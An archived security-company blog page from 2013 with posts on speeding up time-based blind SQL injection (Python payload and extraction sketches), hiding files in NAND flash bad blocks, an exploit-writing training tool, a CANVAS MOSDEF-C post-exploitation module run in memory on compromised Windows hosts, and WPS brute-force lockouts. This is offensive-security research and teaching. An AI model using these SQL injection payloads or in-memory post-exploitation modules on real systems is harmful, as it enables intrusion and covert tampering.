Thursday, February 28, 2013

Infiltrate Preview - Exfiltrate: Efficient Blind SQLi

Most of my work at Immunity is focused on the large-scale detection of vulnerabilities in web applications. Naturally, a good portion of my effort has gone towards detecting SQL injections (SQLi). Not only are they among the most common vulnerabilities to be found, but they are often the most critical, as they can get an attacker's foot in the door.

Of course, in order for an SQLi to be useful, there has to be some measurable response from the database that is being injected into. Timing attacks have proven to be the most reliable method for detecting an SQLi, as they do not rely on any output from the database making it through to the interface layer of the target web page or service. Commonly, this type of vulnerability is known as a "blind" SQL injection.

The basic idea behind an SQLi timing attack is to use SLEEP commands to force the database on the back end to delay its response. You then ask the database a series of true/false questions. If a response comes back at least "sleep_time" seconds later, you know that the answer is true.
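A minimal sketch of one such true/false question, assuming a MySQL-style back end where IF(cond, SLEEP(n), 0) delays the response only when the condition holds. The names build_payload, ask and fake_send are hypothetical and exist only for illustration; fake_send stands in for a real HTTP request so the example runs offline.

```python
import time

def build_payload(condition, sleep_time):
    # MySQL-style syntax (an assumption); other databases use other delay functions.
    return "' AND IF((%s), SLEEP(%s), 0)-- -" % (condition, sleep_time)

def ask(send_request, condition, sleep_time):
    """Return True if the response came back at least sleep_time seconds later."""
    start = time.time()
    send_request(build_payload(condition, sleep_time))
    return (time.time() - start) >= sleep_time

def fake_send(payload):
    # Hypothetical stand-in for the target: a little latency, plus a delay
    # only when the injected condition is the always-true "1=1".
    time.sleep(0.01)
    if "(1=1)" in payload:
        time.sleep(0.2)

answer_true = ask(fake_send, "1=1", 0.2)
answer_false = ask(fake_send, "1=2", 0.2)
```

Against a real target, send_request would issue the HTTP request carrying the payload in the injectable parameter.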

An SQLi detection (top) and a test run against a page with no SQLi (bottom)

This simple technique almost guarantees the validity of an SQLi vulnerability; however, it comes with several challenges. Real-world attacks often involve VPNs, proxies, and other technologies that can add considerable uncertainty to response times. A good timing attack algorithm has to account for these variables while keeping sleep times as low as possible, which leads to the second major challenge of timing attacks: efficiency.
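One possible heuristic for balancing those two goals, sketched under stated assumptions: measure a handful of un-delayed responses, then pick the smallest sleep time whose midpoint still clears the observed jitter by k standard deviations. This is an illustration only, not the algorithm used in the research described here; calibrate, k and floor are hypothetical names.

```python
import math

def calibrate(baseline_samples, k=3.0, floor=0.05):
    """Return (sleep_time, threshold) derived from un-delayed response times."""
    n = float(len(baseline_samples))
    mean = sum(baseline_samples) / n
    variance = sum((s - mean) ** 2 for s in baseline_samples) / n
    std = math.sqrt(variance)
    # The decision boundary sits halfway between "normal" and "delayed",
    # so half the sleep time must exceed k standard deviations of jitter.
    sleep_time = max(floor, 2.0 * k * std)
    threshold = mean + sleep_time / 2.0
    return sleep_time, threshold

samples = [0.10, 0.12, 0.11, 0.13, 0.09]   # seconds, made-up measurements
sleep_time, threshold = calibrate(samples)
```

A response slower than threshold would be read as "true"; noisier links produce a larger sleep_time and therefore a slower extraction.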

Even with an attack against a local web server, the algorithm I am working with is only capable of pulling data from a database at ~2kbit/s. That's not nearly fast enough when the goal is to download the target's entire database. So how can we speed up the process? That is the main question I am asking right now in my research, and there are a number of roads to go down in searching for the answer. To sample a few potential solutions:

  • Unblinding: The database exists, after all, to provide data to the interface layer. Can we move the data we want somewhere where we can actually see it?
  • Get curious: Why ask just one question?
  • Distribute: Nobody likes a DoS, so architectures are more commonly accounting for traffic spikes. How many questions can the database answer at the same time?
  • Prediction: If we have some of the data, can we predict the rest?
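For context on why efficiency matters, here is a sketch of a common baseline: since each question yields one bit, a binary search over the character value recovers a 7-bit character in 7 questions. This is not necessarily the approach from the talk; is_greater is a hypothetical oracle that would, in a real attack, be backed by a timed request.

```python
def extract_char(is_greater, position):
    """Binary-search the ASCII value of one character using yes/no questions."""
    low, high = 0, 127
    while low < high:
        mid = (low + high) // 2
        if is_greater(position, mid):
            low = mid + 1
        else:
            high = mid
    return chr(low)

def extract_string(is_greater, length):
    return "".join(extract_char(is_greater, i) for i in range(length))

# Hypothetical stand-in for the database: answers "is char at position > value?"
SECRET = "admin"
questions = []

def fake_is_greater(position, value):
    questions.append((position, value))
    return ord(SECRET[position]) > value

recovered = extract_string(fake_is_greater, len(SECRET))
```

Five characters cost 35 questions here, and every "true" answer costs a full sleep, which is why asking fewer or parallel questions pays off.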

In my talk at Infiltrate, I'll be demonstrating some of these ideas. Know of another technique? Let me know and I may shamelessly implement it!

Wednesday, February 27, 2013

Infiltrate Preview - NAND-Xplore -> Bad Blocks = Well Hidden

Please, welcome Josh "m0nk" Thomas, our first Infiltrate Guest Blogger!

Post-Ex can be sexy


So, you’re frustrated: You’ve spent countless nights discovering the most epic remote mobile 0day imaginable and innumerable hours crafting an intricate payload… only to get the whole thing popped by some stupid Android based AV variant. It’s not like you write typical “churn and burn” malware or ransom-ware where everything is on an expendable cycle; you really are trying to pull off some covert, next-level long term injections and they all just caught fire. Hmmm… It might be time to calm down on the offensive front until you have an acceptable post-exploit landscape to build upon.

“But m0nk, post-exploit is boring and not sexy; right?”

Actually, I think you are dead wrong. Post exploitation can actually be far more deviant than exploitation and the findings typically have a longer shelf life. With that mentality in mind, the NAND-Xplore project was born. The NAND-Xplore project is an attempt to investigate just how deep files can be hidden on an embedded system, starting with a deep understanding of the “bare metal hardware” well below the operating environment. The project attempts to expose weaknesses in the actual NAND data storage hardware / implementation architectures and showcase the vulnerable underpinnings across the spectrum of NAND based platforms. The project is focused on 2 POC tools: one to hide files on NAND devices and one to find them. The overall assumption of the project is that real world advanced malware already contains these tricks, we just don’t know about it yet.

Before the Infiltrate talk itself, I thought it might be useful to share some background info on the NAND Flash technologies themselves. The talk will pick up where this blog post leaves off, primarily with how the Linux kernel interacts with NAND flash and how those interactions can be manipulated and controlled.

A Deeper Understanding of How NAND Functions

Sample NAND Prototype chip with visible blocks and pages

Hardware functionality of actual NAND Flash

In the most basic sense, NAND devices store individual bits of data in a multidimensional array of floating-gate transistors. The floating-gate transistors allow each cell to trap individual electrons, thus keeping or removing a charge. It is this charge that corresponds to a single 0 or 1 for the device. The multiplexed transistor design, coupled with the concept of Fowler-Nordheim tunnel injection and release, allows this grid of floating gates to access cells at a single bit level. In layman’s terms, consider the NAND flash to behave as a highly dense, addressable LED array.

A Simple NAND Circuit


Each individual flash cell is contained in a collection designated as a page. Pages on NAND devices are typically collections of 512, 2048 or 4096 bytes. In turn, pages are collected into a construct known as a block. NAND block sizes are typically powers of two and can range from 16 KB to 512 KB.

While the grid architecture of NAND flash allows for addressing at the single bit level, such accuracy comes with a hard set of limitations:

  • All bits on the device default to and are initially set to a 1. The shift from a 1 to a 0 is a simple electronic pulse to open the gate and dump the stored electron. Sadly, shifting the other direction (from a 0 to a 1) is non-trivial and cannot be performed at the bit level, only at the block level. As such, shifting a stored byte of 1111 1111 to 1010 1010 is trivial, but the reverse would entail erasing an entire block of 512 KB.
  • The physical floating-gate transistors are fragile and slowly wear down over time. Typical industry expectations are that each gate can survive around 100,000 state changes before becoming unreliable and unstable. Once a block has become unstable, the NAND controller has the ability to mark it “bad”. This designation will ensure the block is removed from rotation and can no longer be read or accessed automatically.
  • As the gates wear over time, charge leakage can occur. This leakage will corrupt neighboring cells and their stored information. Charge leakage can also occur with exceptionally high levels of repeated reading, even without writing to a cell. This is mostly due to the power utilized across the grid to query a specific cell.
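The first limitation can be modeled in a few lines. The sketch below is a toy simulation, not a driver: programming is a bitwise AND with what is already stored (bits can only go from 1 to 0), and only a whole-block erase brings bits back to 1. The class name NandBlock and the 2048-byte page / 64-page geometry are assumptions chosen for illustration.

```python
class NandBlock(object):
    """Toy model of one NAND block: program clears bits, erase resets the block."""

    def __init__(self, page_size=2048, pages_per_block=64):
        self.page_size = page_size
        # Erased flash reads back as all 1s (0xFF bytes).
        self.pages = [bytearray(b"\xff" * page_size) for _ in range(pages_per_block)]
        self.erase_count = 0

    def program(self, page, offset, data):
        # Programming can only move bits from 1 to 0: result = old AND new.
        target = self.pages[page]
        for i, byte in enumerate(bytearray(data)):
            target[offset + i] &= byte

    def erase(self):
        # The only way back to 1s is to erase every page in the block.
        for page in self.pages:
            page[:] = b"\xff" * self.page_size
        self.erase_count += 1

block = NandBlock()
block.program(0, 0, b"\xaa")   # 1111 1111 -> 1010 1010 works
block.program(0, 0, b"\xff")   # trying to set the bits back has no effect
after_program = block.pages[0][0]
block.erase()
after_erase = block.pages[0][0]
```

The erase_count field hints at the second limitation: each erase is one of a finite number of state changes the block can survive.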


Given these limitations, NAND designers and manufacturers introduced automated leveling across the devices. This process attempts to distribute digital information across the hardware in an even manner, not allowing any single bit, page or block to be utilized more than another. The leveling software will also copy highly accessed information around the NAND to discourage charge leakage. With the correct tools, this phenomenon can be seen through low-level analysis of a NAND. Typically, a forensics analyst can view multiple histories of a file because the NAND flash controller will elect to copy the entire file to a new block of NAND instead of modifying the existing imprint. These older versions of the file stay resident until the block is reset and new data is written. This, as well as all other NAND interactions, is managed by the NAND controller hardware. The NAND controller is also the main reason why writing successive 0’s and 1’s repeatedly over an entire device is meaningless to the technology: the controller will typically disallow such wasteful access to the memory.
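A toy sketch of that behavior, assuming a very simplified policy: every write goes to the erased block with the lowest erase count, and the previous copy is left in place until its block is erased. Real controllers are far more elaborate; TinyWearLeveler and its methods are hypothetical names for illustration.

```python
class TinyWearLeveler(object):
    """Out-of-place writes: new data lands on the least-worn erased block."""

    def __init__(self, num_blocks):
        self.erase_counts = [0] * num_blocks
        self.contents = [None] * num_blocks   # None means "erased"
        self.live = {}                        # file name -> current physical block

    def write(self, name, data):
        free = [b for b in range(len(self.contents)) if self.contents[b] is None]
        if not free:
            raise RuntimeError("no erased blocks; garbage collection is not modeled")
        target = min(free, key=lambda b: self.erase_counts[b])
        self.contents[target] = (name, data)
        self.live[name] = target   # any older copy is now stale but still present
        return target

    def erase(self, block):
        self.contents[block] = None
        self.erase_counts[block] += 1

    def stale_copies(self, name):
        current = self.live.get(name)
        return [entry[1] for block, entry in enumerate(self.contents)
                if entry is not None and entry[0] == name and block != current]

leveler = TinyWearLeveler(4)
leveler.write("notes.txt", "version 1")
leveler.write("notes.txt", "version 2")
history = leveler.stale_copies("notes.txt")
```

The history list is the toy equivalent of the multiple file versions a forensics analyst can recover from a real device.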

Toshiba NAND Reference Design with NAND Controller


The final applicable detail about NAND flash pertains to mass production yields, transistor size and quality control. Manufacturers are constantly pushing the size of this hardware to be well below a 100% reliable component threshold. As such, devices are known to contain and ship with bad and unusable sections. These sections, much like the blocks that have exhausted their write endurance, are marked as “bad” at the controller level using a collection of NAND flash based error codes. These blocks are simply considered unusable by the overall system and are removed from the addressable space of the memory by the NAND controller. The NAND controller supports this functionality by keeping an active map of the hardware detailing valid and error-prone blocks.

Lastly, it should be noted that most but not all embedded NAND flash devices contain a hardware-based NAND controller. Those devices that do not contain controlling hardware, such as smart cards, USB storage devices and the like, expect the controlling operating system to mark, flag, control and manipulate the hardware directly. As such, most modern operating systems have a basic understanding of NAND error and correction codes. For the devices that do contain hardware-based controllers, the operating system and hardware drivers perform read and write operations in a similar manner to their older magnetic platter counterparts.
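As a rough illustration of that block map, the sketch below assumes the simplest possible scheme: logical block numbers are assigned to good physical blocks in order, so anything marked bad never appears in the addressable space. Real controllers typically use reserved spare areas and more involved remap tables; build_block_map is a hypothetical helper.

```python
def build_block_map(total_blocks, bad_blocks):
    """Return a list where index = logical block and value = physical block."""
    bad = set(bad_blocks)
    return [physical for physical in range(total_blocks) if physical not in bad]

def hidden_blocks(total_blocks, block_map):
    """Physical blocks that no logical address can reach."""
    reachable = set(block_map)
    return [b for b in range(total_blocks) if b not in reachable]

block_map = build_block_map(8, bad_blocks=[2, 5])
unreachable = hidden_blocks(8, block_map)
```

Whatever sits in the unreachable blocks is invisible to anything that only sees the logical address space.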

Overview of the NAND Flash Standards

The 2 main standards bodies relevant to NAND are JEDEC and ONFI.   

Development NAND Breakout with a standard TSOP connection

The JEDEC (Joint Electron Device Engineering Council) committee is primarily concerned with ensuring the various vendors and manufacturers of NAND Flash hardware conform to certain chip package hardware standards. JEDEC is also concerned with ensuring general interoperability between manufacturers and NAND designs. JEDEC provides this service for numerous types of hardware and is far from a NAND-specific committee.

The ONFI (Open NAND Flash Interface) group is a governing body for NAND Flash specific interface standards. The group intends to dictate how NAND will interface with other hardware and (to some extent) other software in the wild.

In general, most NAND devices connect to other hardware with either a TSOP (Thin Small Outline Package) or BGA (Ball Grid Array) connection. The referenced standards dictate the footprint and layout of the hardware. In typical situations, embedded NAND is delivered on a 169 ball BGA package.

Standard Types of NAND to Board connections

Raw NAND vs. FTL Technologies

NAND Flash can come in a variety of configurations when manufactured. In specific relation to this research we can categorize them as such:
  • Raw NAND
  • NAND + FTL (Managed NAND)
Raw NAND Flash is a slab of NAND storage in its most basic form, and all management of the hardware and storage interactions is performed in software outside of the NAND. The Linux kernel utilizes the MTD (Memory Technology Device) subsystem to interact with these devices. This grouping contains only bare NAND and other MTD-based devices. To add to the confusion, some raw NAND devices do have embedded ECC (error correction) and simple block management. The main differentiation in this instance is that the Linux kernel is treated as the master controller of the hardware, with the embedded processing simply supporting it.


NAND + FTL devices contain an on-package NAND controller that manages the slab of NAND flash internal to the chip. This controller will manage bad blocks, wear leveling and data access internally and provide an FTL (Flash Translation Layer) interface to outside software such as the Linux kernel. The FTL presents the NAND hardware as a standard block device externally. Though there are significant differences in implementation, this broad grouping contains MMC, eMMC, SD and SSD devices.
Raw NAND vs. Managed NAND (FTL)

Revisiting Post-Ex: Moving forward

Now that we all have a good understanding of the basic NAND architecture, we can have a little fun with data and process hiding. See you @ Infiltrate.

Monday, February 25, 2013

VisualSploit 2.0

Immunity is well known for products designed to make the lives and duties of network professionals, security auditors and penetration testers much easier. However, one of the lesser-known features of CANVAS is VisualSploit.

VisualSploit is a learning utility that we created specifically for our popular Unethical Hacking training course that we conduct at INFILTRATE.

I have been an instructor of this course for a few years now, so I have been in a position to see how a lot of people consume, assimilate and digest topics such as buffer overflows, memory corruption, debugging and assembly. My conclusion is that these topics are best illustrated with simple, visual tools. This way the students can walk away with a solid understanding of what happens before, during and after a buffer overflow.

VisualSploit is that simple, visual tool. I decided to create VisualSploit v2.0 for a few reasons, but topping the list is that I had been paying close attention to how the tool could be improved so that students get the most out of training and learning about these topics.

The new VisualSploit v2.0 web interface




During the Unethical Hacking course we teach you everything you need to know about assembly in order to write an exploit for buffer overflows.  With the help of VisualSploit you can literally go from analyzing the crash in Immunity Debugger to a working exploit/proof of concept in a matter of minutes because no programming is required.  VisualSploit behind the scenes just builds a CANVAS exploit for you which means that everything you build will be available to you as a regular exploit module the next time you start up CANVAS.  You're welcome.

This visual and hands-on method of teaching and learning about buffer overflows is very effective.  I have yet to encounter a student who didn't have that "ah-ha!" moment where it all clicked and they were able to finish writing the more challenging (and fun) exploits for real-world applications by the end of the course.

So come join me in April during the INFILTRATE edition of the Unethical Hacking class.  It will be fun and educational but more importantly you get to break stuff.

- @MarkWuergler


Friday, February 15, 2013

MOSDEF-C for you and me

One of the super neat things about CANVAS and MOSDEF is that they provide a vehicle to write code that executes in the memory of an exploited host, meaning it doesn't have to touch disk if you don't want it to. This is a boon for covertness, as it forces any defensive measures to do in-memory forensics. So today we'll take a look at a quick post-exploitation command that I wrote up for CANVAS based on a Windows kernel quirk discovered by Walied Assar.

Walied discovered a signedness error in NtSetInformationThread. I'll let his blog cover the specifics, but what it means for us is that we can set a thread's I/O and memory priority to max. While this isn't terribly relevant in a security context (you could leverage a more efficient DoS on the box you have code exec on, but that's silly), writing up a quick module is demonstrative, so let's go ahead and dive in!

When you start out on this path I would strongly encourage you to have working C/C++ code to base the module on because debugging in this scenario can be a frustrating process. So you will need:

1) Working C/C++ code
2) A Windows 7 VM with Immunity Debugger installed
3) A standard callback trojan deployed on the Win7 VM

When writing a new CANVAS module you'll need to create a new directory under CANVAS_ROOT/exploits with the module's name (note '-' is not allowed in module names so use '_' instead), and then within that directory you'll need a dialog.glade2 file as well as a .py with the module name. So my directory structure looks like:

CANVAS_ROOT/exploits/threadio
    dialog.glade2
    threadio.py
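A small sketch of that layout rule, for checking a module name before creating anything on disk. The helper module_paths is hypothetical and not part of CANVAS; it only builds the two paths described above and rejects names containing '-'.

```python
import os

def module_paths(canvas_root, module_name):
    """Return (module_dir, [required files]) for a new CANVAS module."""
    if "-" in module_name:
        raise ValueError("'-' is not allowed in module names; use '_' instead")
    module_dir = os.path.join(canvas_root, "exploits", module_name)
    files = [
        os.path.join(module_dir, "dialog.glade2"),
        os.path.join(module_dir, module_name + ".py"),
    ]
    return module_dir, files

module_dir, required_files = module_paths("CANVAS_ROOT", "threadio")
```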

Normally we recommend that customers take an existing module and adapt it to their needs. I used windows_sniffer for this purpose, but it required a lot of work since windows_sniffer is fairly complex and threadio is very simple. If you plan on writing your own commands using MOSDEF-C I'd recommend using threadio as your example, so just copy it into your exploit module's directory, give it the proper name and start modifying. Let's take a look at some source:

#! /usr/bin/env python

# Proprietary CANVAS source code - use only under the license agreement
# specified in LICENSE.txt in your CANVAS distribution
# Copyright Immunity, Inc, 2002-2013
# http://www.immunityinc.com/CANVAS/ for more information

import sys
if "." not in sys.path: sys.path.append(".")


from localNode          import localNode
from timeoutsocket      import Timeout
from MOSDEF.mosdefutils import intel_order
from ExploitTypes.localcommand import LocalCommand

NAME                        = "threadio"
DESCRIPTION                 = "Set thread I/O and memory priority to max"
VERSION                     = "0.1"
GTK2_DIALOG                 = "dialog.glade2"
DOCUMENTATION               = {}
DOCUMENTATION["References"] = "http://waleedassar.blogspot.com/2013/02/kernel-bug-0-threadiopriority.html"
DOCUMENTATION["Notes"]      = """

Tested on Win7 x86

A module to demonstrate MOSDEF-C, if you're looking to pass simple values (int) 
back from the host this is a good demonstration

It will attempt to set a thread's I/O and memory priority to the maximum assignable values

"""

PROPERTY               = {}
PROPERTY['SITE']       = "Local"
PROPERTY['TYPE']       = "Commands"
PROPERTY['ARCH']       = [ ["Windows"] ]

I generally call this the preamble to the module, where we take care of imports, the documentation dictionary and the properties dictionary. All of this should be easy to understand if you've done any Python so I'll just touch on a few points. 1) All the variables are required (NAME, DOCUMENTATION, etc), 2) it is worth your while to fill these out completely when you begin writing the module especially the references section. Finding that blog post you want to remember two months from now is not very fun.


class theexploit(LocalCommand):
    def __init__(self):
        LocalCommand.__init__(self)
        self.result         = ""
        self.name           = NAME       

    def run(self):
        self.setInfo("%s (in progress)" % (NAME))

        node     = self.argsDict['passednodes'][0]
        type     = node.nodetype.lower()
        nodename = node.getname()

        if isinstance(node, localNode):
            self.log('Node of type %s not supported.' % type)
            return 0
            
        if type not in ['win32node']:
            self.log('Node of type %s not supported yet.' % type)
            return 0

The "theexploit" class is the standard class from which all modules are run; by subclassing LocalCommand (in lieu of, say, tcpexploit) we tell CANVAS what type of module this is. Next we get into the run function, which is another required function and where, in this case, all of our heavy lifting occurs.

With all command type modules it's always a good plan to put in some helpful error checking which you see with our first two if statements. node = self.argsDict['passednodes'][0] provides us a node object which we can compare against another object type, localNode. If you've ever used the CANVAS GUI localNode is the red circle that represents your CANVAS host, so here we check to ensure that isn't selected, because commands are meant to be run on compromised hosts rather than your CANVAS host. Next we get our node type with type = node.nodetype.lower() and check it against a list of node types this will work against. Since this is a Windows kernel issue it makes sense that we only allow the module to be run on Windows nodes.

        code = """
        #import "remote", "ntdll.dll|ZwSetInformationThread" as "ZwSetInformationThread"
        #import "remote", "ntdll.dll|ZwQueryInformationThread" as "ZwQueryInformationThread"
        #import "remote", "kernel32.dll|GetCurrentThread" as "GetCurrentThread"
        #import "remote", "kernel32.dll|GetCurrentThreadId" as "GetCurrentThreadId"
        #import "local", "sendint" as "sendint"
        void main() {
            int success;
            int threadId;
            int setResult;
            int queryResult;
            unsigned long p1;
            unsigned long p2;
            
            success = 42;
            p1 = 0xFF3FFF3C;
            p2 = 0;
            
            threadId = GetCurrentThreadId();
            sendint(threadId);
            setResult = ZwSetInformationThread(GetCurrentThread(), 0x16, &p1, 4);
            sendint(setResult);
            queryResult = ZwQueryInformationThread(GetCurrentThread(),0x16, &p2,4,0);
            sendint(queryResult);
            sendint(success);
        }
        """
        
        # Compile the code and ship it over
        vars = {}
        node.shell.clearfunctioncache()
        request = node.shell.compile(code, vars)
        node.shell.sendrequest(request)

This is the meat of our module. I'll leave the specifics of the C code to the blog post referenced in the first paragraph, but I do want to point out a few things. First, this example is tied to MOSDEF-C for win32. If you're interested in MOSDEF-C for win64 I'll refer you to the windows_sniffer module; the changes are important but not difficult. In MOSDEF-C you have to import all your functions, and you do this with a line like: #import "remote", "ntdll.dll|ZwSetInformationThread" as "ZwSetInformationThread". A few things to note here: MSDN is your friend for determining which DLLs should contain which functions, but save yourself the aggravation and check that this is the case by using Immunity Debugger. Open a program that has your DLL loaded, press Alt+E to open the executable modules list, right click your DLL, choose View Names and find your function name. Additionally, it is wise (though not required) to import the function into MOSDEF-C with the same name as it exists in the Windows API.

Having a line like: #import "remote", "ntdll.dll|ZwSetInformationThread" as "ZwSetInformationThreat"; is very annoying to debug if you use ZwSetInformationThread() later. Which brings me to my next point: yacc will give you some help when compiling on the CANVAS side before shipping the code over to the target host, but once it passes compilation you will have to use your cunning, savvy and a debugger to find any host-side errors.
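One way to rule out that kind of alias typo is to generate the import lines instead of typing them. The helpers below are hypothetical conveniences, not part of MOSDEF; they only reproduce the #import line format shown in the module source above.

```python
def mosdef_remote_import(dll, function):
    """Build a remote #import line whose alias always matches the API name."""
    return '#import "remote", "%s|%s" as "%s"' % (dll, function, function)

def mosdef_local_import(name):
    """Build a local #import line (e.g. for the sendint built-in)."""
    return '#import "local", "%s" as "%s"' % (name, name)

imports = "\n".join([
    mosdef_remote_import("ntdll.dll", "ZwSetInformationThread"),
    mosdef_remote_import("ntdll.dll", "ZwQueryInformationThread"),
    mosdef_remote_import("kernel32.dll", "GetCurrentThread"),
    mosdef_remote_import("kernel32.dll", "GetCurrentThreadId"),
    mosdef_local_import("sendint"),
])
```

The resulting string can be prepended to the C source before it is handed to the compile step.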

Variables do take a bit to get used to. Declaring a variable via: int ret = 4; gave me headaches. So I declared all my variables at the top then assigned them values after they'd all been declared. It may not be your style but I stopped getting wonky yacc errors after I followed this method.

sendint is a MOSDEF built-in that allows you to, as you might expect, send an integer back to your CANVAS host. This is incredibly useful for localizing where your MOSDEF-C might be failing, and I make use of it in multiple locations. You'll note that the success variable isn't strictly required, as no additional instructions are executed after the ZwQueryInformationThread call. This is a remnant of development, but having a final send after all substantive instructions have been executed allows you to know that all of your code ran.

        # Handle the responses (one readint() per sendint() in the C code, same order)
        threadId = 0
        success = 0
        threadId = node.shell.readint(signed=True)     # recv threadId
        setResult = node.shell.readint(signed=False)   # recv ZwSetInformationThread status
        queryResult = node.shell.readint(signed=False) # recv ZwQueryInformationThread status
        success = node.shell.readint(signed=True)      # recv success, not strictly needed
        node.shell.leave()

As you may expect, CANVAS has a corresponding readint() for receiving these values. I found it helpful to have my CANVAS Python variable names and my MOSDEF-C variable names be consistent and to label my readint()'s with enough information that I could easily figure out which one wasn't firing. When you get into more complex code, like a readint() within a conditional statement, keeping things labeled will help immensely with debugging.
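A sketch of that labeling idea taken one step further: keep the labels in a list and log each one just before the read, so a stalled readint() identifies itself. The helper read_labeled and the FakeShell class are hypothetical; the only call assumed from CANVAS is shell.readint(signed=...), as used in the module above.

```python
def read_labeled(shell, fields, log):
    """Read one integer per (label, signed) pair, logging the label first."""
    results = {}
    for label, signed in fields:
        log("waiting for %s" % label)
        results[label] = shell.readint(signed=signed)
    return results

class FakeShell(object):
    """Stand-in for node.shell so the sketch runs without a CANVAS node."""
    def __init__(self, values):
        self.values = list(values)

    def readint(self, signed=False):
        return self.values.pop(0)

messages = []
fields = [("threadId", True), ("setResult", False),
          ("queryResult", False), ("success", True)]
values = read_labeled(FakeShell([1234, 0, 0, 42]), fields, messages.append)
```

In a module, log would be self.log and the field order must mirror the sendint() calls in the MOSDEF-C source.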

        # Let's have some verbose error handling
        try:
            if threadId == 0:
                self.log("Unable to get current thread ID, this will likely fail")
            
            setResult = hex(setResult)
            if setResult != "0x0":
                self.log("Received an error when attempting to call ZwSetInformationThread")
                self.log("Error no: %s"%(setResult))
                self.log("Check here for error details: http://msdn.microsoft.com/en-us/library/cc704588.aspx")
                raise ValueError
            
            if queryResult != 0:
                self.log("Error when attempting to call ZwQueryInformationThread, the module may have worked but unable to confirm")
                raise ValueError
            
            if success != 42:
                self.log("Encountered an error before the module exited")
                raise ValueError
            
        except ValueError:
            self.setInfo("%s - Done (failed)"%(NAME))
            return 0
        
        except Exception as e:
            # Log through CANVAS rather than print, so the message reaches the log window
            self.log("Encountered an unhandled exception: %s" % e)
            self.setInfo("%s - Done (failed)"%(NAME))
            return 0

This may not be the most elegant or Pythonic way to do error handling but I found it made sense to me. The more effort you put into having good error handling now means debugging this module in six months when Microsoft has adjusted something is much easier. A few functions here that are useful: self.log() will generate CANVAS log events, I recommend using this over print for debugging. self.setInfo() will set the module's status in the Current Status GUI tab and is helpful to set if others will be using your code.
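One fragile spot in the checks above is comparing hex(setResult) against the string "0x0": on Python 2, hex() of a long value ends in "L", so the comparison would fail if readint() ever returned a long. A sketch of a numeric alternative follows; format_ntstatus and nt_success are hypothetical helpers, and the success test mirrors the usual Windows convention that a status with the top bit clear is not an error.

```python
def format_ntstatus(value):
    """Render a status as 8 hex digits, e.g. 0xC000000D, whatever its sign."""
    return "0x%08X" % (value & 0xFFFFFFFF)

def nt_success(value):
    """True when the top bit is clear (success or informational status)."""
    return (value & 0x80000000) == 0

STATUS_SUCCESS = 0x00000000
STATUS_INVALID_PARAMETER = 0xC000000D

ok_text = format_ntstatus(STATUS_SUCCESS)
err_text = format_ntstatus(-1073741811)   # same status read as a signed int
```

With these, the check becomes "if not nt_success(setResult)" and the log line can print format_ntstatus(setResult) for lookup in the NTSTATUS table.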

        self.log("Thread Id: %d"%threadId)
        self.log("ZwSetInformationThread: %s"%setResult)
        self.log("ZwQueryInformationThread: %s"%queryResult)
        self.log("Success: %d"%success)
        
        self.setInfo("%s - Done (success)"%(NAME))
        return 1

Finally we dump some information to the user and tell CANVAS the module has completed by returning. As you can probably guess return 0 will tell CANVAS the module failed, return 1 the module succeeded.

I think the benefit of MOSDEF-C is that it quickly allows you to interface with the Windows API without touching the remote file system. There's no DLL to load; if you have a Windows CANVAS Node, this code is inserted into the running process and run there. A defender may be able to determine that a machine was compromised, but determining what specifically was done to that machine can be substantially more difficult if you make use of techniques like this. After all, hooking the entire Windows API isn't practical.

MOSDEF-C is a bit of a labor of love. If you're interested in starting to use it I would seriously suggest starting to read through the ./MOSDEF/ directory in CANVAS and then proceeding to ./MOSDEF/MOSDEFlibc. It is a powerful tool but it's important to note some of the current implementation limitations and some of the language quirks before you start doing anything too complicated.

The link to the complete module source can be found at: http://partners.immunityinc.com/threadio.tar

Wednesday, February 13, 2013

WPS Attack Detection and Reaction

Those of us in the security industry are well aware that it can take vendors a long time to develop and deploy a preventative measure in reaction to an attack.  This is especially true with embedded devices that have no auto-update feature and/or are completely forgotten about once they are up and running on the network.

As a refresher, in December of 2011 an attack was published that targeted a weakness in the Wi-Fi Protected Setup (WPS) protocol and demonstrated how to significantly decrease the number of attempts needed to derive a valid WPS PIN during a brute force attack.  This attack leaves most routers that have WPS enabled vulnerable to an attacker learning the WPA Pre-Shared Key (PSK) or WEP key, as well as gaining access to more configuration information.
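To put a number on that reduction, the arithmetic below follows the publicly documented description of the attack: the PIN is 8 digits with the last digit acting as a checksum, and the protocol confirms the first four digits separately from the remaining three. The variable names are for illustration only.

```python
# Naive brute force: 7 free digits (the 8th is a checksum of the others).
naive_attempts = 10 ** 7

# Split attack: the first half (4 digits) is confirmed on its own,
# then the second half (3 free digits plus the checksum).
first_half_attempts = 10 ** 4
second_half_attempts = 10 ** 3
split_attempts = first_half_attempts + second_half_attempts

reduction_factor = naive_attempts // split_attempts
```

That works out to at most 11,000 attempts instead of 10,000,000, roughly a 900-fold reduction in the worst case.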

Click here to see a video of an attack against WPS using SILICA.

Most routers are still vulnerable to this attack today because there is no easy way to disable WPS in the router's configuration interface (a regular user is not going to go through the trouble of modifying firmware) and few people or organizations are diligent about checking for and installing new firmware.  I should also mention that most people who use or administer a wireless router are probably oblivious to the fact that there is such a weakness in WPS and don't disable it even if they can (after all, it is a protocol meant to be a convenience for the admin and network users).

Even though it usually takes a long time for vendors to respond to this kind of attack we have recently seen a change in Netgear's firmware that actually addresses the security weakness.  Take a look at the following section taken from a Netgear R6300 web interface:



This is the first vendor response that I have seen for the WPS PIN attack.  After 3 failed attempts the feature is disabled and you get the following message next to the feature configuration: 


 

This obviously does offer another avenue of attack in the form of a not-so-exciting denial of service (DoS), making it easy for an attacker to turn off WPS altogether.
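A toy model of that lockout, to show why it doubles as a denial of service: once the failure limit is hit, even the correct PIN is refused. The limit of 3 comes from the behavior described above; everything else (the class name, the absence of any automatic re-enable) is an assumption, not a description of Netgear's firmware.

```python
class WpsPinLockout(object):
    """Disable PIN entry after max_failures wrong attempts."""

    def __init__(self, correct_pin, max_failures=3):
        self.correct_pin = correct_pin
        self.max_failures = max_failures
        self.failures = 0
        self.enabled = True

    def try_pin(self, pin):
        if not self.enabled:
            return False               # feature is off: nobody gets in via PIN
        if pin == self.correct_pin:
            return True
        self.failures += 1
        if self.failures >= self.max_failures:
            self.enabled = False       # lockout kicks in
        return False

ap = WpsPinLockout("12345670")
for guess in ("00000000", "11111111", "22222222"):
    ap.try_pin(guess)
legit_user_result = ap.try_pin("12345670")
```

Three deliberately wrong guesses from an attacker are enough to leave the legitimate user locked out of WPS.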

This slightly changes the game (and by slightly I mean not very much).  It used to be that identifying that WPS is enabled was all an attacker needed to determine if the AP was vulnerable to this attack (no major or minor versions to check before launching the attack - it's kind of the same feeling you get when you are pentesting a ColdFusion server/application; it doesn't matter the version you just know it's vulnerable). 

